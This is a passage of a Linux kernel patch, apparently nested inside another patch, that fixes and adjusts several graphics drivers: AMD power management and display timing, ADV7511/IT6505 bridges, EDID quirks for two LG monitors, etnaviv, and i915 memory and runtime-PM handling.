+ 	unsigned int dcfclk = context->bw_ctx.dml.vba.DCFCLKState[vlevel][context->bw_ctx.dml.vba.maxMpcComb];
+ 	unsigned int socclk = context->bw_ctx.dml.vba.SOCCLKPerState[vlevel];
++	struct vba_vars_st *vba = &context->bw_ctx.dml.vba;
+ 
+ 	dc_assert_fp_enabled();
+ 
+@@ -569,6 +571,11 @@ void dcn32_set_phantom_stream_timing(struct dc *dc,
+ 	phantom_vactive = get_subviewport_lines_needed_in_mall(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx) +
+ 				pstate_width_fw_delay_lines + dc->caps.subvp_swath_height_margin_lines;
+ 
++	// W/A for DCC corruption with certain high resolution timings.
++	// Determing if pipesplit is used. If so, add meta_row_height to the phantom vactive.
++	num_dpp = vba->NoOfDPP[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]];
++	phantom_vactive += num_dpp > 1 ? vba->meta_row_height[vba->pipe_plane[pipe_idx]] : 0;
++
+ 	// For backporch of phantom pipe, use vstartup of the main pipe
+ 	phantom_bp = get_vstartup(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx);
+ 
+diff --git a/drivers/gpu/drm/amd/include/kgd_pp_interface.h b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+index a40ead44778af..d18162e9ed1da 100644
+--- a/drivers/gpu/drm/amd/include/kgd_pp_interface.h
++++ b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+@@ -354,7 +354,8 @@ struct amd_pm_funcs {
+ 	int (*get_power_profile_mode)(void *handle, char *buf);
+ 	int (*set_power_profile_mode)(void *handle, long *input, uint32_t size);
+ 	int (*set_fine_grain_clk_vol)(void *handle, uint32_t type, long *input, uint32_t size);
+-	int (*odn_edit_dpm_table)(void *handle, uint32_t type, long *input, uint32_t size);
++	int (*odn_edit_dpm_table)(void *handle, enum PP_OD_DPM_TABLE_COMMAND type,
++				  long *input, uint32_t size);
+ 	int (*set_mp1_state)(void *handle, enum pp_mp1_state mp1_state);
+ 	int (*smu_i2c_bus_access)(void *handle, bool acquire);
+ 	int (*gfx_state_change_set)(void *handle, uint32_t state);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index ec055858eb95a..1159ae114dd02 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -838,7 +838,8 @@ static int pp_set_fine_grain_clk_vol(void *handle, uint32_t type, long *input, u
+ 	return hwmgr->hwmgr_func->set_fine_grain_clk_vol(hwmgr, type, input, size);
+ }
+ 
+-static int pp_odn_edit_dpm_table(void *handle, uint32_t type, long *input, uint32_t size)
++static int pp_odn_edit_dpm_table(void *handle, enum PP_OD_DPM_TABLE_COMMAND type,
++				 long *input, uint32_t size)
+ {
+ 	struct pp_hwmgr *hwmgr = handle;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+index 67d7da0b6fed5..1d829402cd2e2 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+@@ -75,8 +75,10 @@ int psm_init_power_state_table(struct pp_hwmgr *hwmgr)
+ 	for (i = 0; i < table_entries; i++) {
+ 		result = hwmgr->hwmgr_func->get_pp_table_entry(hwmgr, i, state);
+ 		if (result) {
++			kfree(hwmgr->current_ps);
+ 			kfree(hwmgr->request_ps);
+ 			kfree(hwmgr->ps);
++			hwmgr->current_ps = NULL;
+ 			hwmgr->request_ps = NULL;
+ 			hwmgr->ps = NULL;
+ 			return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+index 190af79f3236f..dad3e3741a4e8 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+@@ -67,21 +67,22 @@ int vega10_fan_ctrl_get_fan_speed_info(struct pp_hwmgr *hwmgr,
+ int vega10_fan_ctrl_get_fan_speed_pwm(struct pp_hwmgr *hwmgr,
+ 		uint32_t *speed)
+ {
+-	struct amdgpu_device *adev = hwmgr->adev;
+-	uint32_t duty100, duty;
+-	uint64_t tmp64;
++	uint32_t current_rpm;
++	uint32_t percent = 0;
+ 
+-	duty100 = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_FDO_CTRL1),
+-				CG_FDO_CTRL1, FMAX_DUTY100);
+-	duty = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_THERMAL_STATUS),
+-				CG_THERMAL_STATUS, FDO_PWM_DUTY);
++	if (hwmgr->thermal_controller.fanInfo.bNoFan)
++		return 0;
+ 
+-	if (!duty100)
+-		return -EINVAL;
++	if (vega10_get_current_rpm(hwmgr, &current_rpm))
++		return -1;
++
++	if (hwmgr->thermal_controller.
++			advanceFanControlParameters.usMaxFanRPM != 0)
++		percent = current_rpm * 255 /
++			hwmgr->thermal_controller.
++			advanceFanControlParameters.usMaxFanRPM;
+ 
+-	tmp64 = (uint64_t)duty * 255;
+-	do_div(tmp64, duty100);
+-	*speed = MIN((uint32_t)tmp64, 255);
++	*speed = MIN(percent, 255);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+index 97b3ad3690467..b30684c84e20e 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+@@ -2961,7 +2961,8 @@ static int vega20_odn_edit_dpm_table(struct pp_hwmgr *hwmgr,
+ 			data->od8_settings.od8_settings_array;
+ 	OverDriveTable_t *od_table =
+ 			&(data->smc_state_table.overdrive_table);
+-	int32_t input_index, input_clk, input_vol, i;
++	int32_t input_clk, input_vol, i;
++	uint32_t input_index;
+ 	int od8_id;
+ 	int ret;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+index 70b560737687e..ad5f6a15a1d7d 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+@@ -1588,6 +1588,10 @@ bool smu_v11_0_baco_is_support(struct smu_context *smu)
+ 	if (amdgpu_sriov_vf(smu->adev) || !smu_baco->platform_support)
+ 		return false;
+ 
++	/* return true if ASIC is in BACO state already */
++	if (smu_v11_0_baco_get_state(smu) == SMU_BACO_STATE_ENTER)
++		return true;
++
+ 	/* Arcturus does not support this bit mask */
+ 	if (smu_cmn_feature_is_supported(smu, SMU_FEATURE_BACO_BIT) &&
+ 	   !smu_cmn_feature_is_enabled(smu, SMU_FEATURE_BACO_BIT))
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index d74debc584f89..39deb06a86ba3 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -1436,7 +1436,7 @@ static int smu_v13_0_7_get_power_limit(struct smu_context *smu,
+ 
+ static int smu_v13_0_7_get_power_profile_mode(struct smu_context *smu, char *buf)
+ {
+-	DpmActivityMonitorCoeffIntExternal_t activity_monitor_external[PP_SMC_POWER_PROFILE_COUNT];
++	DpmActivityMonitorCoeffIntExternal_t *activity_monitor_external;
+ 	uint32_t i, j, size = 0;
+ 	int16_t workload_type = 0;
+ 	int result = 0;
+@@ -1444,6 +1444,12 @@ static int smu_v13_0_7_get_power_profile_mode(struct smu_context *smu, char *buf
+ 	if (!buf)
+ 		return -EINVAL;
+ 
++	activity_monitor_external = kcalloc(PP_SMC_POWER_PROFILE_COUNT,
++					    sizeof(*activity_monitor_external),
++					    GFP_KERNEL);
++	if (!activity_monitor_external)
++		return -ENOMEM;
++
+ 	size += sysfs_emit_at(buf, size, "                              ");
+ 	for (i = 0; i <= PP_SMC_POWER_PROFILE_WINDOW3D; i++)
+ 		size += sysfs_emit_at(buf, size, "%-14s%s", amdgpu_pp_profile_name[i],
+@@ -1456,15 +1462,17 @@ static int smu_v13_0_7_get_power_profile_mode(struct smu_context *smu, char *buf
+ 		workload_type = smu_cmn_to_asic_specific_index(smu,
+ 							       CMN2ASIC_MAPPING_WORKLOAD,
+ 							       i);
+-		if (workload_type < 0)
+-			return -EINVAL;
++		if (workload_type < 0) {
++			result = -EINVAL;
++			goto out;
++		}
+ 
+ 		result = smu_cmn_update_table(smu,
+ 					  SMU_TABLE_ACTIVITY_MONITOR_COEFF, workload_type,
+ 					  (void *)(&activity_monitor_external[i]), false);
+ 		if (result) {
+ 			dev_err(smu->adev->dev, "[%s] Failed to get activity monitor!", __func__);
+-			return result;
++			goto out;
+ 		}
+ 	}
+ 
+@@ -1492,7 +1500,10 @@ do {													\
+ 	PRINT_DPM_MONITOR(Fclk_BoosterFreq);
+ #undef PRINT_DPM_MONITOR
+ 
+-	return size;
++	result = size;
++out:
++	kfree(activity_monitor_external);
++	return result;
+ }
+ 
+ static int smu_v13_0_7_set_power_profile_mode(struct smu_context *smu, long *input, uint32_t size)
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7511.h b/drivers/gpu/drm/bridge/adv7511/adv7511.h
+index 94de73cbeb2dd..17445800248dd 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7511.h
++++ b/drivers/gpu/drm/bridge/adv7511/adv7511.h
+@@ -402,7 +402,8 @@ static inline int adv7511_cec_init(struct device *dev, struct adv7511 *adv7511)
+ 
+ void adv7533_dsi_power_on(struct adv7511 *adv);
+ void adv7533_dsi_power_off(struct adv7511 *adv);
+-void adv7533_mode_set(struct adv7511 *adv, const struct drm_display_mode *mode);
++enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
++					const struct drm_display_mode *mode);
+ int adv7533_patch_registers(struct adv7511 *adv);
+ int adv7533_patch_cec_registers(struct adv7511 *adv);
+ int adv7533_attach_dsi(struct adv7511 *adv);
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+index f887200e8abc9..78b72739e5c3e 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+@@ -697,7 +697,7 @@ adv7511_detect(struct adv7511 *adv7511, struct drm_connector *connector)
+ }
+ 
+ static enum drm_mode_status adv7511_mode_valid(struct adv7511 *adv7511,
+-			      struct drm_display_mode *mode)
++			      const struct drm_display_mode *mode)
+ {
+ 	if (mode->clock > 165000)
+ 		return MODE_CLOCK_HIGH;
+@@ -791,9 +791,6 @@ static void adv7511_mode_set(struct adv7511 *adv7511,
+ 	regmap_update_bits(adv7511->regmap, 0x17,
+ 		0x60, (vsync_polarity << 6) | (hsync_polarity << 5));
+ 
+-	if (adv7511->type == ADV7533 || adv7511->type == ADV7535)
+-		adv7533_mode_set(adv7511, adj_mode);
+-
+ 	drm_mode_copy(&adv7511->curr_mode, adj_mode);
+ 
+ 	/*
+@@ -913,6 +910,18 @@ static void adv7511_bridge_mode_set(struct drm_bridge *bridge,
+ 	adv7511_mode_set(adv, mode, adj_mode);
+ }
+ 
++static enum drm_mode_status adv7511_bridge_mode_valid(struct drm_bridge *bridge,
++						      const struct drm_display_info *info,
++		const struct drm_display_mode *mode)
++{
++	struct adv7511 *adv = bridge_to_adv7511(bridge);
++
++	if (adv->type == ADV7533 || adv->type == ADV7535)
++		return adv7533_mode_valid(adv, mode);
++	else
++		return adv7511_mode_valid(adv, mode);
++}
++
+ static int adv7511_bridge_attach(struct drm_bridge *bridge,
+ 				 enum drm_bridge_attach_flags flags)
+ {
+@@ -960,6 +969,7 @@ static const struct drm_bridge_funcs adv7511_bridge_funcs = {
+ 	.enable = adv7511_bridge_enable,
+ 	.disable = adv7511_bridge_disable,
+ 	.mode_set = adv7511_bridge_mode_set,
++	.mode_valid = adv7511_bridge_mode_valid,
+ 	.attach = adv7511_bridge_attach,
+ 	.detect = adv7511_bridge_detect,
+ 	.get_edid = adv7511_bridge_get_edid,
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7533.c b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+index ef6270806d1d3..258c79d4dab0a 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7533.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+@@ -100,26 +100,27 @@ void adv7533_dsi_power_off(struct adv7511 *adv)
+ 	regmap_write(adv->regmap_cec, 0x27, 0x0b);
+ }
+ 
+-void adv7533_mode_set(struct adv7511 *adv, const struct drm_display_mode *mode)
++enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
++					const struct drm_display_mode *mode)
+ {
++	int lanes;
+ 	struct mipi_dsi_device *dsi = adv->dsi;
+-	int lanes, ret;
+-
+-	if (adv->num_dsi_lanes != 4)
+-		return;
+ 
+ 	if (mode->clock > 80000)
+ 		lanes = 4;
+ 	else
+ 		lanes = 3;
+ 
+-	if (lanes != dsi->lanes) {
+-		mipi_dsi_detach(dsi);
+-		dsi->lanes = lanes;
+-		ret = mipi_dsi_attach(dsi);
+-		if (ret)
+-			dev_err(&dsi->dev, "failed to change host lanes\n");
+-	}
++	/*
++	 * TODO: add support for dynamic switching of lanes
++	 * by using the bridge pre_enable() op . Till then filter
++	 * out the modes which shall need different number of lanes
++	 * than what was configured in the device tree.
++	 */
++	if (lanes != dsi->lanes)
++		return MODE_BAD;
++
++	return MODE_OK;
+ }
+ 
+ int adv7533_patch_registers(struct adv7511 *adv)
+diff --git a/drivers/gpu/drm/bridge/ite-it6505.c b/drivers/gpu/drm/bridge/ite-it6505.c
+index dfe4351c9bdd3..99123eec45511 100644
+--- a/drivers/gpu/drm/bridge/ite-it6505.c
++++ b/drivers/gpu/drm/bridge/ite-it6505.c
+@@ -2860,10 +2860,7 @@ static int it6505_bridge_attach(struct drm_bridge *bridge,
+ 	}
+ 
+ 	/* Register aux channel */
+-	it6505->aux.name = "DP-AUX";
+-	it6505->aux.dev = dev;
+ 	it6505->aux.drm_dev = bridge->dev;
+-	it6505->aux.transfer = it6505_aux_transfer;
+ 
+ 	ret = drm_dp_aux_register(&it6505->aux);
+ 
+@@ -3316,6 +3313,11 @@ static int it6505_i2c_probe(struct i2c_client *client,
+ 	DRM_DEV_DEBUG_DRIVER(dev, "it6505 device name: %s", dev_name(dev));
+ 	debugfs_init(it6505);
+ 
++	it6505->aux.name = "DP-AUX";
++	it6505->aux.dev = dev;
++	it6505->aux.transfer = it6505_aux_transfer;
++	drm_dp_aux_init(&it6505->aux);
++
+ 	it6505->bridge.funcs = &it6505_bridge_funcs;
+ 	it6505->bridge.type = DRM_MODE_CONNECTOR_DisplayPort;
+ 	it6505->bridge.ops = DRM_BRIDGE_OP_DETECT | DRM_BRIDGE_OP_EDID |
+diff --git a/drivers/gpu/drm/drm_atomic_helper.c b/drivers/gpu/drm/drm_atomic_helper.c
+index 98cc3137c0625..02b4a7dc92f5e 100644
+--- a/drivers/gpu/drm/drm_atomic_helper.c
++++ b/drivers/gpu/drm/drm_atomic_helper.c
+@@ -945,7 +945,6 @@ int drm_atomic_helper_check_crtc_state(struct drm_crtc_state *crtc_state,
+ 				       bool can_disable_primary_planes)
+ {
+ 	struct drm_device *dev = crtc_state->crtc->dev;
+-	struct drm_atomic_state *state = crtc_state->state;
+ 
+ 	if (!crtc_state->enable)
+ 		return 0;
+@@ -956,14 +955,7 @@ int drm_atomic_helper_check_crtc_state(struct drm_crtc_state *crtc_state,
+ 		struct drm_plane *plane;
+ 
+ 		drm_for_each_plane_mask(plane, dev, crtc_state->plane_mask) {
+-			struct drm_plane_state *plane_state;
+-
+-			if (plane->type != DRM_PLANE_TYPE_PRIMARY)
+-				continue;
+-			plane_state = drm_atomic_get_plane_state(state, plane);
+-			if (IS_ERR(plane_state))
+-				return PTR_ERR(plane_state);
+-			if (plane_state->fb && plane_state->crtc) {
++			if (plane->type == DRM_PLANE_TYPE_PRIMARY) {
+ 				has_primary_plane = true;
+ 				break;
+ 			}
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 4005dab6147d9..b36abfa915813 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -87,6 +87,8 @@ static int oui(u8 first, u8 second, u8 third)
+ #define EDID_QUIRK_FORCE_10BPC			(1 << 11)
+ /* Non desktop display (i.e. HMD) */
+ #define EDID_QUIRK_NON_DESKTOP			(1 << 12)
++/* Cap the DSC target bitrate to 15bpp */
++#define EDID_QUIRK_CAP_DSC_15BPP		(1 << 13)
+ 
+ #define MICROSOFT_IEEE_OUI	0xca125c
+ 
+@@ -147,6 +149,12 @@ static const struct edid_quirk {
+ 	EDID_QUIRK('F', 'C', 'M', 13600, EDID_QUIRK_PREFER_LARGE_75 |
+ 				       EDID_QUIRK_DETAILED_IN_CM),
+ 
++	/* LG 27GP950 */
++	EDID_QUIRK('G', 'S', 'M', 0x5bbf, EDID_QUIRK_CAP_DSC_15BPP),
++
++	/* LG 27GN950 */
++	EDID_QUIRK('G', 'S', 'M', 0x5b9a, EDID_QUIRK_CAP_DSC_15BPP),
++
+ 	/* LGD panel of HP zBook 17 G2, eDP 10 bpc, but reports unknown bpc */
+ 	EDID_QUIRK('L', 'G', 'D', 764, EDID_QUIRK_FORCE_10BPC),
+ 
+@@ -6166,6 +6174,7 @@ static void drm_reset_display_info(struct drm_connector *connector)
+ 
+ 	info->mso_stream_count = 0;
+ 	info->mso_pixel_overlap = 0;
++	info->max_dsc_bpp = 0;
+ }
+ 
+ static u32 update_display_info(struct drm_connector *connector,
+@@ -6252,6 +6261,9 @@ out:
+ 		info->non_desktop = true;
+ 	}
+ 
++	if (quirks & EDID_QUIRK_CAP_DSC_15BPP)
++		info->max_dsc_bpp = 15;
++
+ 	return quirks;
+ }
+ 
+diff --git a/drivers/gpu/drm/drm_fourcc.c b/drivers/gpu/drm/drm_fourcc.c
+index e09331bb3bc73..6242dfbe92402 100644
+--- a/drivers/gpu/drm/drm_fourcc.c
++++ b/drivers/gpu/drm/drm_fourcc.c
+@@ -297,12 +297,12 @@ const struct drm_format_info *__drm_format_info(u32 format)
+ 		  .vsub = 2, .is_yuv = true },
+ 		{ .format = DRM_FORMAT_Q410,		.depth = 0,
+ 		  .num_planes = 3, .char_per_block = { 2, 2, 2 },
+-		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 0,
+-		  .vsub = 0, .is_yuv = true },
++		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 1,
++		  .vsub = 1, .is_yuv = true },
+ 		{ .format = DRM_FORMAT_Q401,		.depth = 0,
+ 		  .num_planes = 3, .char_per_block = { 2, 2, 2 },
+-		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 0,
+-		  .vsub = 0, .is_yuv = true },
++		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 1,
++		  .vsub = 1, .is_yuv = true },
+ 		{ .format = DRM_FORMAT_P030,            .depth = 0,  .num_planes = 2,
+ 		  .char_per_block = { 4, 8, 0 }, .block_w = { 3, 3, 0 }, .block_h = { 1, 1, 0 },
+ 		  .hsub = 2, .vsub = 2, .is_yuv = true},
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gpu.c b/drivers/gpu/drm/etnaviv/etnaviv_gpu.c
+index 37018bc55810d..f667e7906d1f4 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gpu.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gpu.c
+@@ -416,6 +416,12 @@ static void etnaviv_hw_identify(struct etnaviv_gpu *gpu)
+ 	if (gpu->identity.model == chipModel_GC700)
+ 		gpu->identity.features &= ~chipFeatures_FAST_CLEAR;
+ 
++	/* These models/revisions don't have the 2D pipe bit */
++	if ((gpu->identity.model == chipModel_GC500 &&
++	     gpu->identity.revision <= 2) ||
++	    gpu->identity.model == chipModel_GC300)
++		gpu->identity.features |= chipFeatures_PIPE_2D;
++
+ 	if ((gpu->identity.model == chipModel_GC500 &&
+ 	     gpu->identity.revision < 2) ||
+ 	    (gpu->identity.model == chipModel_GC300 &&
+@@ -449,8 +455,9 @@ static void etnaviv_hw_identify(struct etnaviv_gpu *gpu)
+ 				gpu_read(gpu, VIVS_HI_CHIP_MINOR_FEATURE_5);
+ 	}
+ 
+-	/* GC600 idle register reports zero bits where modules aren't present */
+-	if (gpu->identity.model == chipModel_GC600)
++	/* GC600/300 idle register reports zero bits where modules aren't present */
++	if (gpu->identity.model == chipModel_GC600 ||
++	    gpu->identity.model == chipModel_GC300)
+ 		gpu->idle_mask = VIVS_HI_IDLE_STATE_TX |
+ 				 VIVS_HI_IDLE_STATE_RA |
+ 				 VIVS_HI_IDLE_STATE_SE |
+diff --git a/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c b/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c
+index 4d4a715b429d1..2c2b92324a2e9 100644
+--- a/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c
++++ b/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c
+@@ -60,8 +60,9 @@ static int fsl_dcu_drm_connector_get_modes(struct drm_connector *connector)
+ 	return drm_panel_get_modes(fsl_connector->panel, connector);
+ }
+ 
+-static int fsl_dcu_drm_connector_mode_valid(struct drm_connector *connector,
+-					    struct drm_display_mode *mode)
++static enum drm_mode_status
++fsl_dcu_drm_connector_mode_valid(struct drm_connector *connector,
++				 struct drm_display_mode *mode)
+ {
+ 	if (mode->hdisplay & 0xf)
+ 		return MODE_ERROR;
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index 28bdb936cd1fc..edbdb949b6ced 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -414,7 +414,7 @@ static void *generate_lfp_data_ptrs(struct drm_i915_private *i915,
+ 		ptrs->lvds_entries++;
+ 
+ 	if (size != 0 || ptrs->lvds_entries != 3) {
+-		kfree(ptrs);
++		kfree(ptrs_block);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 2b5bc95a8b0df..78b3427471bd7 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -3675,61 +3675,6 @@ static void intel_dp_phy_pattern_update(struct intel_dp *intel_dp,
+ 	}
+ }
+ 
+-static void
+-intel_dp_autotest_phy_ddi_disable(struct intel_dp *intel_dp,
+-				  const struct intel_crtc_state *crtc_state)
+-{
+-	struct intel_digital_port *dig_port = dp_to_dig_port(intel_dp);
+-	struct drm_device *dev = dig_port->base.base.dev;
+-	struct drm_i915_private *dev_priv = to_i915(dev);
+-	struct intel_crtc *crtc = to_intel_crtc(dig_port->base.base.crtc);
+-	enum pipe pipe = crtc->pipe;
+-	u32 trans_ddi_func_ctl_value, trans_conf_value, dp_tp_ctl_value;
+-
+-	trans_ddi_func_ctl_value = intel_de_read(dev_priv,
+-						 TRANS_DDI_FUNC_CTL(pipe));
+-	trans_conf_value = intel_de_read(dev_priv, PIPECONF(pipe));
+-	dp_tp_ctl_value = intel_de_read(dev_priv, TGL_DP_TP_CTL(pipe));
+-
+-	trans_ddi_func_ctl_value &= ~(TRANS_DDI_FUNC_ENABLE |
+-				      TGL_TRANS_DDI_PORT_MASK);
+-	trans_conf_value &= ~PIPECONF_ENABLE;
+-	dp_tp_ctl_value &= ~DP_TP_CTL_ENABLE;
+-
+-	intel_de_write(dev_priv, PIPECONF(pipe), trans_conf_value);
+-	intel_de_write(dev_priv, TRANS_DDI_FUNC_CTL(pipe),
+-		       trans_ddi_func_ctl_value);
+-	intel_de_write(dev_priv, TGL_DP_TP_CTL(pipe), dp_tp_ctl_value);
+-}
+-
+-static void
+-intel_dp_autotest_phy_ddi_enable(struct intel_dp *intel_dp,
+-				 const struct intel_crtc_state *crtc_state)
+-{
+-	struct intel_digital_port *dig_port = dp_to_dig_port(intel_dp);
+-	struct drm_device *dev = dig_port->base.base.dev;
+-	struct drm_i915_private *dev_priv = to_i915(dev);
+-	enum port port = dig_port->base.port;
+-	struct intel_crtc *crtc = to_intel_crtc(dig_port->base.base.crtc);
+-	enum pipe pipe = crtc->pipe;
+-	u32 trans_ddi_func_ctl_value, trans_conf_value, dp_tp_ctl_value;
+-
+-	trans_ddi_func_ctl_value = intel_de_read(dev_priv,
+-						 TRANS_DDI_FUNC_CTL(pipe));
+-	trans_conf_value = intel_de_read(dev_priv, PIPECONF(pipe));
+-	dp_tp_ctl_value = intel_de_read(dev_priv, TGL_DP_TP_CTL(pipe));
+-
+-	trans_ddi_func_ctl_value |= TRANS_DDI_FUNC_ENABLE |
+-				    TGL_TRANS_DDI_SELECT_PORT(port);
+-	trans_conf_value |= PIPECONF_ENABLE;
+-	dp_tp_ctl_value |= DP_TP_CTL_ENABLE;
+-
+-	intel_de_write(dev_priv, PIPECONF(pipe), trans_conf_value);
+-	intel_de_write(dev_priv, TGL_DP_TP_CTL(pipe), dp_tp_ctl_value);
+-	intel_de_write(dev_priv, TRANS_DDI_FUNC_CTL(pipe),
+-		       trans_ddi_func_ctl_value);
+-}
+-
+ static void intel_dp_process_phy_request(struct intel_dp *intel_dp,
+ 					 const struct intel_crtc_state *crtc_state)
+ {
+@@ -3748,14 +3693,10 @@ static void intel_dp_process_phy_request(struct intel_dp *intel_dp,
+ 	intel_dp_get_adjust_train(intel_dp, crtc_state, DP_PHY_DPRX,
+ 				  link_status);
+ 
+-	intel_dp_autotest_phy_ddi_disable(intel_dp, crtc_state);
+-
+ 	intel_dp_set_signal_levels(intel_dp, crtc_state, DP_PHY_DPRX);
+ 
+ 	intel_dp_phy_pattern_update(intel_dp, crtc_state);
+ 
+-	intel_dp_autotest_phy_ddi_enable(intel_dp, crtc_state);
+-
+ 	drm_dp_dpcd_write(&intel_dp->aux, DP_TRAINING_LANE0_SET,
+ 			  intel_dp->train_set, crtc_state->lane_count);
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index 73d9eda1d6b7a..e63329bc80659 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -413,7 +413,7 @@ retry:
+ 	vma->mmo = mmo;
+ 
+ 	if (CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND)
+-		intel_wakeref_auto(&to_gt(i915)->userfault_wakeref,
++		intel_wakeref_auto(&i915->runtime_pm.userfault_wakeref,
+ 				   msecs_to_jiffies_timeout(CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND));
+ 
+ 	if (write) {
+@@ -557,11 +557,13 @@ void i915_gem_object_runtime_pm_release_mmap_offset(struct drm_i915_gem_object *
+ 
+ 	drm_vma_node_unmap(&bo->base.vma_node, bdev->dev_mapping);
+ 
+-	if (obj->userfault_count) {
+-		/* rpm wakeref provide exclusive access */
+-		list_del(&obj->userfault_link);
+-		obj->userfault_count = 0;
+-	}
++	/*
++	 * We have exclusive access here via runtime suspend. All other callers
++	 * must first grab the rpm wakeref.
++	 */
++	GEM_BUG_ON(!obj->userfault_count);
++	list_del(&obj->userfault_link);
++	obj->userfault_count = 0;
+ }
+ 
+ void i915_gem_object_release_mmap_offset(struct drm_i915_gem_object *obj)
+@@ -587,13 +589,6 @@ void i915_gem_object_release_mmap_offset(struct drm_i915_gem_object *obj)
+ 		spin_lock(&obj->mmo.lock);
+ 	}
+ 	spin_unlock(&obj->mmo.lock);
+-
+-	if (obj->userfault_count) {
+-		mutex_lock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
+-		list_del(&obj->userfault_link);
+-		mutex_unlock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
+-		obj->userfault_count = 0;
+-	}
+ }
+ 
+ static struct i915_mmap_offset *
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_pm.c b/drivers/gpu/drm/i915/gem/i915_gem_pm.c
+index 3428f735e786c..8d30db5e678c4 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_pm.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_pm.c
+@@ -24,7 +24,7 @@ void i915_gem_suspend(struct drm_i915_private *i915)
+ {
+ 	GEM_TRACE("%s\n", dev_name(i915->drm.dev));
+ 
+-	intel_wakeref_auto(&to_gt(i915)->userfault_wakeref, 0);
++	intel_wakeref_auto(&i915->runtime_pm.userfault_wakeref, 0);
+ 	flush_workqueue(i915->wq);
+ 
+ 	/*
